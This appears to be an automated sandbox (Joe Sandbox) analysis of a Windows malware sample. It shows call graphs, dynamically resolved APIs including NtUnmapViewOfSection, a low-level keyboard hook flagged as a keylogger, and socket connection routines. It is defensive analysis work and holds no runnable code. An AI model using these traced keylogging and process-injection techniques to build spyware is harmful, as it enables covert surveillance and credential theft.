46630->47297 46633 4020bf 11 API calls 46634 4139aa 46633->46634 46635 401e45 22 API calls 46634->46635 46636 4139b8 46635->46636 46637 439867 _strftime 39 API calls 46636->46637 46638 4139c5 46637->46638 46639 4139d7 46638->46639 46640 4139ca Sleep 46638->46640 46641 402073 28 API calls 46639->46641 46640->46639 46642 4139e6 46641->46642 46643 401e45 22 API calls 46642->46643 46644 4139ef 46643->46644 46645 4020d6 28 API calls 46644->46645 46646 4139fa 46645->46646 46647 419d87 28 API calls 46646->46647 46648 413a02 46647->46648 47301 40487e WSAStartup 46648->47301 46650 413a0c 46651 401e45 22 API calls 46650->46651 46652 413a15 46651->46652 46653 401e45 22 API calls 46652->46653 46678 413a94 46652->46678 46654 413a2e 46653->46654 46657 401e45 22 API calls 46654->46657 46655 401e45 22 API calls 46655->46678 46656 4020d6 28 API calls 46656->46678 46658 413a3f 46657->46658 46660 401e45 22 API calls 46658->46660 46659 419d87 28 API calls 46659->46678 46661 413a50 46660->46661 46662 401e45 22 API calls 46661->46662 46664 413a61 46662->46664 46663 40822a 28 API calls 46663->46678 46666 401e45 22 API calls 46664->46666 46665 401fc2 28 API calls 46665->46678 46667 413a72 46666->46667 46668 401e45 22 API calls 46667->46668 46669 413a84 46668->46669 47403 40471d 88 API calls 46669->47403 46672 413be2 WSAGetLastError 47404 41a86b 30 API calls 46672->47404 46675 4052dd 28 API calls 46675->46678 46678->46655 46678->46656 46678->46659 46678->46663 46678->46665 46678->46672 46678->46675 46679 4194da 79 API calls 46678->46679 46681 4052fe 28 API calls 46678->46681 46682 401e6d 11 API calls 46678->46682 46683 439867 _strftime 39 API calls 46678->46683 46685 408209 28 API calls 46678->46685 46686 402ef0 28 API calls 46678->46686 46687 402073 28 API calls 46678->46687 46688 401fb8 11 API calls 46678->46688 46690 408098 28 API calls 46678->46690 46693 411f91 31 API calls 46678->46693 46716 413e11 46678->46716 47302 41393f 46678->47302 47307 40480d 46678->47307 47314 404f31 46678->47314 47329 4048a8 connect 46678->47329 47389 404e06 WaitForSingleObject 46678->47389 47405 413013 50 API calls 46678->47405 47406 43f34f 20 API calls 46678->47406 47407 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46678->47407 46679->46678 46681->46678 46682->46678 46684 4144bf Sleep 46683->46684 46684->46678 46685->46678 46686->46678 46687->46678 46688->46678 46690->46678 46693->46678 46694 40415e 28 API calls 46694->46716 46695 419b16 28 API calls 46695->46716 46696 401e45 22 API calls 46697 413e7b GetTickCount 46696->46697 47408 419b16 28 API calls 46697->47408 46701 419c8a 28 API calls 46701->46716 46704 408209 28 API calls 46704->46716 46706 402e81 28 API calls 46706->46716 46707 402ef0 28 API calls 46707->46716 46709 401ee9 11 API calls 46709->46716 46712 402073 28 API calls 46712->46716 46713 4194da 79 API calls 46713->46716 46714 414461 CreateThread 46714->46716 47439 418ccd 104 API calls 46714->47439 46715 401fb8 11 API calls 46715->46716 46716->46678 46716->46694 46716->46695 46716->46696 46716->46701 46716->46704 46716->46706 46716->46707 46716->46709 46716->46712 46716->46713 46716->46714 46716->46715 47409 419ac6 GetTickCount 46716->47409 47410 419a77 30 API calls ___scrt_fastfail 46716->47410 47411 40e2bb 29 API calls 46716->47411 47412 402f11 28 API calls 46716->47412 47413 40826c 28 API calls 46716->47413 47414 404a81 60 API calls ctype 46716->47414 47415 404bf0 112 API calls ___std_exception_copy 46716->47415 47416 409f9a 84 API calls 46716->47416 46717->46151 46718->46159 46719->46163 46722 4020bf 11 API calls 46721->46722 46723 408236 46722->46723 46724 403280 28 API calls 46723->46724 46725 408253 46724->46725 46725->46185 46727 40d5c5 46726->46727 46728 411f5e RegQueryValueExA RegCloseKey 46726->46728 46727->46182 46727->46206 46728->46727 46729->46188 46730->46208 46731->46235 46732->46208 46733->46216 46735 401f66 11 API calls 46734->46735 46736 40c609 46735->46736 46737 40c629 46736->46737 46738 40c65e 46736->46738 46739 40c61f 46736->46739 47440 41959f 29 API calls 46737->47440 46740 419f23 GetCurrentProcess 46738->46740 46742 40c752 GetLongPathNameW 46739->46742 46743 40c663 46740->46743 46745 40415e 28 API calls 46742->46745 46747 40c667 46743->46747 46748 40c6b9 46743->46748 46744 40c632 46749 401ef3 28 API calls 46744->46749 46746 40c767 46745->46746 46750 40415e 28 API calls 46746->46750 46752 40415e 28 API calls 46747->46752 46751 40415e 28 API calls 46748->46751 46753 40c63c 46749->46753 46754 40c776 46750->46754 46755 40c6c7 46751->46755 46756 40c675 46752->46756 46758 401ee9 11 API calls 46753->46758 47443 40c7f9 28 API calls 46754->47443 46761 40415e 28 API calls 46755->46761 46762 40415e 28 API calls 46756->46762 46758->46739 46759 40c789 47444 402f85 28 API calls 46759->47444 46764 40c6dd 46761->46764 46765 40c68b 46762->46765 46763 40c794 47445 402f85 28 API calls 46763->47445 47442 402f85 28 API calls 46764->47442 47441 402f85 28 API calls 46765->47441 46769 40c79e 46772 401ee9 11 API calls 46769->46772 46770 40c6e8 46773 401ef3 28 API calls 46770->46773 46771 40c696 46774 401ef3 28 API calls 46771->46774 46775 40c7a8 46772->46775 46776 40c6f3 46773->46776 46777 40c6a1 46774->46777 46778 401ee9 11 API calls 46775->46778 46779 401ee9 11 API calls 46776->46779 46780 401ee9 11 API calls 46777->46780 46781 40c7b1 46778->46781 46782 40c6fc 46779->46782 46783 40c6aa 46780->46783 46785 401ee9 11 API calls 46781->46785 46786 401ee9 11 API calls 46782->46786 46784 401ee9 11 API calls 46783->46784 46784->46753 46787 40c7ba 46785->46787 46786->46753 46788 401ee9 11 API calls 46787->46788 46789 40c7c3 46788->46789 46790 401ee9 11 API calls 46789->46790 46791 40c7cc 46790->46791 46791->46297 46792->46308 46793->46322 46794->46326 46795->46236 46796->46272 46797->46364 46798->46353 46799->46212 46802 4194b0 LoadResource LockResource SizeofResource 46801->46802 46803 40dd9e 46801->46803 46802->46803 46803->46418 46805 40209f 46804->46805 46813 4023ae 46805->46813 46807 4020aa 46817 4024ea 46807->46817 46809 4020b9 46809->46422 46811 402097 28 API calls 46810->46811 46812 406302 46811->46812 46812->46429 46814 402408 46813->46814 46815 4023b8 46813->46815 46814->46807 46815->46814 46824 402787 11 API calls std::_Deallocate 46815->46824 46818 4024fa 46817->46818 46819 402500 46818->46819 46820 402515 46818->46820 46825 402549 46819->46825 46835 4028c8 46820->46835 46823 402513 46823->46809 46824->46814 46846 402868 46825->46846 46827 40255d 46828 402572 46827->46828 46829 402587 46827->46829 46851 402a14 22 API calls 46828->46851 46830 4028c8 28 API calls 46829->46830 46834 402585 46830->46834 46832 40257b 46852 4029ba 22 API calls 46832->46852 46834->46823 46836 4028d1 46835->46836 46837 402933 46836->46837 46838 4028db 46836->46838 46860 402884 22 API calls 46837->46860 46841 4028e4 46838->46841 46842 4028f7 46838->46842 46854 402c8e 46841->46854 46844 4028f5 46842->46844 46845 4023ae 11 API calls 46842->46845 46844->46823 46845->46844 46847 402870 46846->46847 46848 402878 46847->46848 46853 402c83 22 API calls 46847->46853 46848->46827 46851->46832 46852->46834 46855 402c98 __EH_prolog 46854->46855 46861 402e34 22 API calls 46855->46861 46857 4023ae 11 API calls 46859 402d72 46857->46859 46858 402d04 46858->46857 46859->46844 46861->46858 46863 4020c7 46862->46863 46864 4023ae 11 API calls 46863->46864 46865 4020d2 46864->46865 46865->46456 46866->46456 46867->46456 46868->46445 46869->46457 46870->46461 46871->46466 46872->46464 46876 40328a 46874->46876 46875 4032a9 46875->46477 46876->46875 46877 4028c8 28 API calls 46876->46877 46877->46875 46879 4051db 46878->46879 46888 405254 46879->46888 46881 4051e8 46881->46480 46883 402041 46882->46883 46884 4023ae 11 API calls 46883->46884 46885 40205b 46884->46885 46910 40265a 46885->46910 46889 405262 46888->46889 46890 405268 46889->46890 46891 40527e 46889->46891 46899 4025d0 46890->46899 46893 4052d5 46891->46893 46894 405296 46891->46894 46908 402884 22 API calls 46893->46908 46897 4028c8 28 API calls 46894->46897 46898 40527c 46894->46898 46897->46898 46898->46881 46900 402868 22 API calls 46899->46900 46901 4025e2 46900->46901 46902 402652 46901->46902 46903 402609 46901->46903 46909 402884 22 API calls 46902->46909 46906 4028c8 28 API calls 46903->46906 46907 40261b 46903->46907 46906->46907 46907->46898 46911 40266b 46910->46911 46912 4023ae 11 API calls 46911->46912 46913 40206d 46912->46913 46913->46483 46914->46485 46915->46496 46917 419f30 GetCurrentProcess 46916->46917 46918 4192bc 46916->46918 46917->46918 46919 411f91 RegOpenKeyExA 46918->46919 46920 411fbf RegQueryValueExA RegCloseKey 46919->46920 46921 411fe9 46919->46921 46920->46921 46922 402073 28 API calls 46921->46922 46923 411ffe 46922->46923 46923->46504 46924->46512 46926 4024d9 46925->46926 46927 4024ea 28 API calls 46926->46927 46928 402091 46927->46928 46928->46252 46945 4397c5 46929->46945 46931 438c0b 46951 438557 35 API calls 2 library calls 46931->46951 46933 438bd0 46933->46931 46934 438be5 46933->46934 46944 438bea __cftof 46933->46944 46950 43ad91 20 API calls _Atexit 46934->46950 46937 438c17 46938 438c46 46937->46938 46952 43980a 39 API calls __Toupper 46937->46952 46941 438cb2 46938->46941 46953 439771 20 API calls 2 library calls 46938->46953 46954 439771 20 API calls 2 library calls 46941->46954 46942 438d79 _strftime 46942->46944 46955 43ad91 20 API calls _Atexit 46942->46955 46944->46541 46946 4397ca 46945->46946 46947 4397dd 46945->46947 46956 43ad91 20 API calls _Atexit 46946->46956 46947->46933 46949 4397cf __cftof 46949->46933 46950->46944 46951->46937 46952->46937 46953->46941 46954->46942 46955->46944 46956->46949 46963 401f90 46957->46963 46959 402efe 46960 402035 11 API calls 46959->46960 46961 402f0d 46960->46961 46961->46555 46962->46558 46964 4025d0 28 API calls 46963->46964 46965 401f9d 46964->46965 46965->46959 46967 401f6e 46966->46967 47005 402232 46967->47005 46969 401f79 46969->46568 46971 4080ae 46970->46971 46972 402232 11 API calls 46971->46972 46973 4080c8 46972->46973 47010 404247 46973->47010 46975 4080d6 46976 409203 46975->46976 47041 40a83c 46976->47041 46979 409257 46982 402073 28 API calls 46979->46982 46980 40922f 46981 402073 28 API calls 46980->46981 46983 409239 46981->46983 46984 409262 46982->46984 47045 419bca 28 API calls 46983->47045 46986 402073 28 API calls 46984->46986 46988 409271 46986->46988 46987 409247 47046 40a0b0 31 API calls ___std_exception_copy 46987->47046 46990 4194da 79 API calls 46988->46990 46991 409276 CreateThread 46990->46991 46993 409291 CreateThread 46991->46993 46994 40929d CreateThread 46991->46994 47048 409305 46991->47048 46992 40924e 46995 401fb8 11 API calls 46992->46995 46993->46994 47054 4092ef 46993->47054 46996 401ee9 11 API calls 46994->46996 47051 409311 46994->47051 46995->46979 46997 4092b1 46996->46997 46997->46589 46998->46583 47173 403202 46999->47173 47001 403002 47177 403242 47001->47177 47004->46600 47200 4092fb 162 API calls 47004->47200 47006 40228c 47005->47006 47007 40223c 47005->47007 47006->46969 47007->47006 47009 402759 11 API calls std::_Deallocate 47007->47009 47009->47006 47011 402868 22 API calls 47010->47011 47012 40425b 47011->47012 47013 404270 47012->47013 47014 404285 47012->47014 47020 4042bf 22 API calls 47013->47020 47022 4027c6 47014->47022 47017 404279 47021 402c28 22 API calls 47017->47021 47019 404283 47019->46975 47020->47017 47021->47019 47023 4027cf 47022->47023 47024 402831 47023->47024 47025 4027d9 47023->47025 47039 402884 22 API calls 47024->47039 47028 4027e2 47025->47028 47029 4027f5 47025->47029 47033 402aca 47028->47033 47031 4027f3 47029->47031 47032 402232 11 API calls 47029->47032 47031->47019 47032->47031 47034 402ad4 __EH_prolog 47033->47034 47040 402e25 22 API calls 47034->47040 47036 402232 11 API calls 47038 402bae 47036->47038 47037 402b40 47037->47036 47038->47031 47040->47037 47042 40a845 47041->47042 47043 409221 47041->47043 47047 40a8bc 28 API calls 47042->47047 47043->46979 47043->46980 47045->46987 47046->46992 47047->47043 47057 40971e 47048->47057 47104 409c1f 47051->47104 47157 409340 47054->47157 47058 409733 Sleep 47057->47058 47078 40966d 47058->47078 47060 40930e 47061 409773 CreateDirectoryW 47067 409745 47061->47067 47062 409784 GetFileAttributesW 47062->47067 47063 401e45 22 API calls 47063->47067 47064 40979b SetFileAttributesW 47064->47067 47065 4020bf 11 API calls 47074 4097e6 47065->47074 47067->47058 47067->47060 47067->47061 47067->47062 47067->47063 47067->47064 47067->47074 47091 41a17b 47067->47091 47068 409815 PathFileExistsW 47068->47074 47070 402097 28 API calls 47070->47074 47071 40991e SetFileAttributesW 47071->47067 47072 4062ee 28 API calls 47072->47074 47073 401fc2 28 API calls 47073->47074 47074->47065 47074->47068 47074->47070 47074->47071 47074->47072 47074->47073 47075 401fb8 11 API calls 47074->47075 47077 401fb8 11 API calls 47074->47077 47101 41a20f 32 API calls 47074->47101 47102 41a27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47074->47102 47075->47074 47077->47067 47079 40971a 47078->47079 47083 409683 47078->47083 47079->47067 47080 4096a2 CreateFileW 47081 4096b0 GetFileSize 47080->47081 47080->47083 47082 4096e5 CloseHandle 47081->47082 47081->47083 47082->47083 47083->47080 47083->47082 47084 4096f7 47083->47084 47085 4096d3 47083->47085 47086 4096da Sleep 47083->47086 47084->47079 47088 408098 28 API calls 47084->47088 47103 40a025 83 API calls 47085->47103 47086->47082 47089 409713 47088->47089 47090 409203 123 API calls 47089->47090 47090->47079 47092 41a18e CreateFileW 47091->47092 47094 41a1c7 47092->47094 47095 41a1cb 47092->47095 47094->47067 47096 41a1d2 SetFilePointer 47095->47096 47097 41a1eb WriteFile 47095->47097 47096->47097 47098 41a1e2 CloseHandle 47096->47098 47099 41a200 CloseHandle 47097->47099 47100 41a1fe 47097->47100 47098->47094 47099->47094 47100->47099 47101->47074 47102->47074 47103->47086 47111 409c2d 47104->47111 47105 40931a 47106 409c87 Sleep GetForegroundWindow GetWindowTextLengthW 47134 40a854 47106->47134 47109 401f66 11 API calls 47109->47111 47111->47105 47111->47106 47111->47109 47114 409ccd GetWindowTextW 47111->47114 47133 409ce7 47111->47133 47140 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 47111->47140 47141 432525 23 API calls __onexit 47111->47141 47142 43215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 47111->47142 47113 419ac6 GetTickCount 47113->47133 47114->47111 47116 409e25 47118 401ee9 11 API calls 47116->47118 47117 40a83c 28 API calls 47117->47133 47118->47105 47119 409d92 Sleep 47119->47133 47122 402073 28 API calls 47122->47133 47123 408098 28 API calls 47123->47133 47125 4052dd 28 API calls 47125->47133 47127 402ff4 28 API calls 47127->47133 47128 408209 28 API calls 47128->47133 47130 40962e 12 API calls 47130->47133 47131 401ee9 11 API calls 47131->47133 47132 401fb8 11 API calls 47132->47133 47133->47111 47133->47113 47133->47116 47133->47117 47133->47119 47133->47122 47133->47123 47133->47125 47133->47127 47133->47128 47133->47130 47133->47131 47133->47132 47143 408080 28 API calls 47133->47143 47144 40a0b0 31 API calls ___std_exception_copy 47133->47144 47145 40a8cc 28 API calls 47133->47145 47146 40a694 40 API calls 2 library calls 47133->47146 47147 43f34f 20 API calls 47133->47147 47148 419bca 28 API calls 47133->47148 47135 40a85c 47134->47135 47136 402232 11 API calls 47135->47136 47137 40a867 47136->47137 47149 40a87c 47137->47149 47139 40a876 47139->47111 47141->47111 47142->47111 47143->47133 47144->47133 47145->47133 47146->47133 47147->47133 47148->47133 47150 40a8b6 47149->47150 47151 40a888 47149->47151 47156 402884 22 API calls 47150->47156 47153 4027c6 28 API calls 47151->47153 47155 40a892 47153->47155 47155->47139 47158 409359 GetModuleHandleA SetWindowsHookExA 47157->47158 47159 4093bb GetMessageA 47157->47159 47158->47159 47161 409375 GetLastError 47158->47161 47160 4093cd TranslateMessage DispatchMessageA 47159->47160 47171 4092f8 47159->47171 47160->47159 47160->47171 47172 419b16 28 API calls 47161->47172 47163 409386 47164 4052dd 28 API calls 47163->47164 47165 409396 47164->47165 47166 402073 28 API calls 47165->47166 47167 4093a5 47166->47167 47168 4194da 79 API calls 47167->47168 47169 4093aa 47168->47169 47170 401fb8 11 API calls 47169->47170 47170->47171 47172->47163 47174 40320e 47173->47174 47183 4035f8 47174->47183 47176 40321b 47176->47001 47178 40324e 47177->47178 47179 402232 11 API calls 47178->47179 47180 403268 47179->47180 47196 402316 47180->47196 47184 403606 47183->47184 47185 403624 47184->47185 47186 40360c 47184->47186 47188 40363c 47185->47188 47189 40367e 47185->47189 47194 403686 28 API calls 47186->47194 47190 403622 47188->47190 47193 4027c6 28 API calls 47188->47193 47195 402884 22 API calls 47189->47195 47190->47176 47193->47190 47194->47190 47197 402327 47196->47197 47198 402232 11 API calls 47197->47198 47199 4023a7 47198->47199 47199->46595 47202 404166 47201->47202 47203 402232 11 API calls 47202->47203 47204 404171 47203->47204 47212 40419c 47204->47212 47207 4042dc 47223 404333 47207->47223 47209 4042ea 47210 403242 11 API calls 47209->47210 47211 4042f9 47210->47211 47211->46608 47213 4041a8 47212->47213 47216 4041b9 47213->47216 47215 40417c 47215->47207 47217 4041c9 47216->47217 47218 4041e6 47217->47218 47219 4041cf 47217->47219 47220 4027c6 28 API calls 47218->47220 47221 404247 28 API calls 47219->47221 47222 4041e4 47220->47222 47221->47222 47222->47215 47224 40433f 47223->47224 47227 404351 47224->47227 47226 40434d 47226->47209 47228 40435f 47227->47228 47229 404365 47228->47229 47230 40437e 47228->47230 47293 4034c6 28 API calls 47229->47293 47231 402868 22 API calls 47230->47231 47232 404386 47231->47232 47234 4043f9 47232->47234 47235 40439f 47232->47235 47294 402884 22 API calls 47234->47294 47237 4027c6 28 API calls 47235->47237 47246 40437c 47235->47246 47237->47246 47246->47226 47293->47246 47295->46616 47300 4198da ctype ___scrt_fastfail 47297->47300 47298 402073 28 API calls 47299 41399f 47298->47299 47299->46633 47300->47298 47301->46650 47303 413958 getaddrinfo WSASetLastError 47302->47303 47304 41394e 47302->47304 47303->46678 47417 4137dc 29 API calls ___std_exception_copy 47304->47417 47306 413953 47306->47303 47308 404826 socket 47307->47308 47309 404819 47307->47309 47311 404840 CreateEventW 47308->47311 47312 404822 47308->47312 47418 40487e WSAStartup 47309->47418 47311->46678 47312->46678 47313 40481e 47313->47308 47313->47312 47315 404fca 47314->47315 47316 404f45 47314->47316 47315->46678 47317 404f4e 47316->47317 47318 404fa0 CreateEventA CreateThread 47316->47318 47319 404f5d GetLocalTime 47316->47319 47317->47318 47318->47315 47420 405130 47318->47420 47419 419b16 28 API calls 47319->47419 47321 404f71 47322 4052dd 28 API calls 47321->47322 47323 404f81 47322->47323 47324 402073 28 API calls 47323->47324 47325 404f90 47324->47325 47326 4194da 79 API calls 47325->47326 47327 404f95 47326->47327 47328 401fb8 11 API calls 47327->47328 47328->47318 47330 4049fb 47329->47330 47331 4048ce 47329->47331 47332 40495e 47330->47332 47333 404a01 WSAGetLastError 47330->47333 47331->47332 47335 4052fe 28 API calls 47331->47335 47355 404903 47331->47355 47332->46678 47333->47332 47334 404a11 47333->47334 47336 404a16 47334->47336 47338 404912 47334->47338 47339 4048ef 47335->47339 47435 41a86b 30 API calls 47336->47435 47342 402073 28 API calls 47338->47342 47343 402073 28 API calls 47339->47343 47341 40490b 47341->47338 47345 404921 47341->47345 47346 404a60 47342->47346 47347 4048fe 47343->47347 47344 404a20 47348 4052dd 28 API calls 47344->47348 47352 404930 47345->47352 47353 404967 47345->47353 47349 402073 28 API calls 47346->47349 47350 4194da 79 API calls 47347->47350 47351 404a30 47348->47351 47354 404a6f 47349->47354 47350->47355 47356 402073 28 API calls 47351->47356 47357 402073 28 API calls 47352->47357 47432 41f7f5 53 API calls 47353->47432 47358 4194da 79 API calls 47354->47358 47424 41ea15 27 API calls 47355->47424 47360 404a3f 47356->47360 47361 40493f 47357->47361 47358->47332 47363 4194da 79 API calls 47360->47363 47364 402073 28 API calls 47361->47364 47362 40496f 47365 4049a4 47362->47365 47366 404974 47362->47366 47367 404a44 47363->47367 47368 40494e 47364->47368 47434 41ebbb 28 API calls 47365->47434 47370 402073 28 API calls 47366->47370 47371 401fb8 11 API calls 47367->47371 47373 4194da 79 API calls 47368->47373 47372 404983 47370->47372 47371->47332 47375 402073 28 API calls 47372->47375 47376 404953 47373->47376 47374 4049ac 47377 4049d9 CreateEventW CreateEventW 47374->47377 47379 402073 28 API calls 47374->47379 47378 404992 47375->47378 47425 41ea55 47376->47425 47377->47332 47380 4194da 79 API calls 47378->47380 47382 4049c2 47379->47382 47383 404997 47380->47383 47384 402073 28 API calls 47382->47384 47433 41ee67 51 API calls 47383->47433 47386 4049d1 47384->47386 47387 4194da 79 API calls 47386->47387 47388 4049d6 47387->47388 47388->47377 47390 404e20 SetEvent CloseHandle 47389->47390 47391 404e37 closesocket 47389->47391 47392 404eb8 47390->47392 47393 404e44 47391->47393 47392->46678 47394 404e53 47393->47394 47395 404e5a 47393->47395 47438 4050c4 83 API calls 47394->47438 47397 404e6c WaitForSingleObject 47395->47397 47398 404eae SetEvent CloseHandle 47395->47398 47399 41ea55 3 API calls 47397->47399 47398->47392 47400 404e7b SetEvent WaitForSingleObject 47399->47400 47401 41ea55 3 API calls 47400->47401 47402 404e93 SetEvent CloseHandle CloseHandle 47401->47402 47402->47398 47403->46678 47404->46678 47405->46678 47406->46678 47407->46678 47408->46716 47409->46716 47410->46716 47411->46716 47412->46716 47413->46716 47414->46716 47415->46716 47416->46716 47417->47306 47418->47313 47419->47321 47423 40513c 101 API calls 47420->47423 47422 405139 47423->47422 47424->47341 47426 41c4c6 47425->47426 47427 41ea5d 47425->47427 47428 41c4d4 47426->47428 47436 41b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47426->47436 47427->47332 47437 41c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47428->47437 47431 41c4db 47432->47362 47433->47376 47434->47374 47435->47344 47436->47428 47437->47431 47438->47395 47440->46744 47441->46771 47442->46770 47443->46759 47444->46763 47445->46769 47448 40e1a8 47446->47448 47447 411f34 3 API calls 47447->47448 47448->47447 47450 40e24e 47448->47450 47452 40e1da 47448->47452 47453 40e23e Sleep 47448->47453 47449 408098 28 API calls 47449->47452 47451 408098 28 API calls 47450->47451 47455 40e25b 47451->47455 47452->47449 47452->47453 47461 401ee9 11 API calls 47452->47461 47464 402073 28 API calls 47452->47464 47468 41215f 14 API calls 47452->47468 47479 40bc59 111 API calls ___scrt_fastfail 47452->47479 47480 419bca 28 API calls 47452->47480 47481 412204 14 API calls 47452->47481 47453->47448 47482 419bca 28 API calls 47455->47482 47458 40e267 47483 412204 14 API calls 47458->47483 47461->47452 47462 40e27a 47463 401ee9 11 API calls 47462->47463 47465 40e286 47463->47465 47464->47452 47466 402073 28 API calls 47465->47466 47467 40e297 47466->47467 47469 41215f 14 API calls 47467->47469 47468->47452 47470 40e2aa 47469->47470 47484 4112b5 TerminateProcess WaitForSingleObject 47470->47484 47472 40e2b2 ExitProcess 47485 411253 61 API calls 47475->47485 47480->47452 47481->47452 47482->47458 47483->47462 47484->47472

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                                    • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                                    • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                                                    • API String ID: 551388010-2474455403
                                                                                                    • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                                    • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                                                    • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                                    • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1231 409340-409357 1232 409359-409373 GetModuleHandleA SetWindowsHookExA 1231->1232 1233 4093bb-4093cb GetMessageA 1231->1233 1232->1233 1236 409375-4093b9 GetLastError call 419b16 call 4052dd call 402073 call 4194da call 401fb8 1232->1236 1234 4093e7 1233->1234 1235 4093cd-4093e5 TranslateMessage DispatchMessageA 1233->1235 1237 4093e9-4093ee 1234->1237 1235->1233 1235->1234 1236->1237
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                                                                                    • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                                                                                    • GetLastError.KERNEL32 ref: 00409375
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                                                                                    • TranslateMessage.USER32(?), ref: 004093D2
                                                                                                    • DispatchMessageA.USER32(?), ref: 004093DD
                                                                                                    Strings
                                                                                                    • Keylogger initialization failure: error , xrefs: 00409389
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
